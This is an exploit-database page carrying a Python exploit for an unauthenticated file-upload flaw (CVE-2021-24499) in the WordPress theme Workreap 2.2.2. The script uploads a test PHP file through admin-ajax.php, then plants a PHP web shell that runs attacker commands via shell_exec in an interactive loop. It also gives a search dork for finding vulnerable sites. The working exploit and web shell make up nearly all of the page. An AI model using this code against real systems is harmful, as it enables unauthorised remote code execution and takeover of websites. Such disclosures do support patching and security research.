WordPress Theme Workreap 2.2.2 Unauthenticated Upload Leading to Remote Code Execution

2023.06.10
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution # Dork: inurl:/wp-content/themes/workreap/ # Date: 2023-06-01 # Category : Webapps # Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454 # Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l) # Version: 2.2.2 # Tested on: Windows/Linux # CVE: CVE-2021-24499 import requests import random import string import sys def usage(): banner = ''' NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution usage: python3 Workreap_rce.py <URL> example for linux : python3 Workreap_rce.py https://www.exploit-db.com example for Windows : python Workreap_rce.py https://www.exploit-db.com ''' print(f"{BOLD}{banner}{ENDC}") def upload_file(target): print("[ ] Uploading File") url = target + "/wp-admin/admin-ajax.php" body = "<?php echo '" + random_str + "';?>" data = {"action": "workreap_award_temp_file_uploader"} response = requests.post(url, data=data, files={"award_img": (file_name, body)}) if '{"type":"success",' in response.text: print(f"{GREEN}[+] File uploaded successfully{ENDC}") check_php_file(target) else: print(f"{RED}[+] File was not uploaded{ENDC}") def check_php_file(target): response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name) if random_str in response_2.text: print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}") print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name) question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}") if question == "y" or question == "Y": print("[ ] Uploading Shell ") get_rce(target) else: usage() else: print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}") def get_rce(target): file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>' data = {"action": "workreap_award_temp_file_uploader"} response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)}) print(f"{GREEN}[+] Shell uploaded successfully{ENDC}") while True: command = input(f"{YELLOW}Enter a command to execute: {ENDC}") print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}") response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}") print(f"{GREEN}{response_4.text}{ENDC}") if __name__ == "__main__": global GREEN , RED, YELLOW, BOLD, ENDC GREEN = '\033[92m' RED = '\033[91m' YELLOW = '\033[93m' BOLD = '\033[1m' ENDC = '\033[0m' file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) try: upload_file(sys.argv[1]) except IndexError: usage() except requests.exceptions.RequestException as e: print("\nPlease Enter Valid Address")


Vote for this issue:
25%
75%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top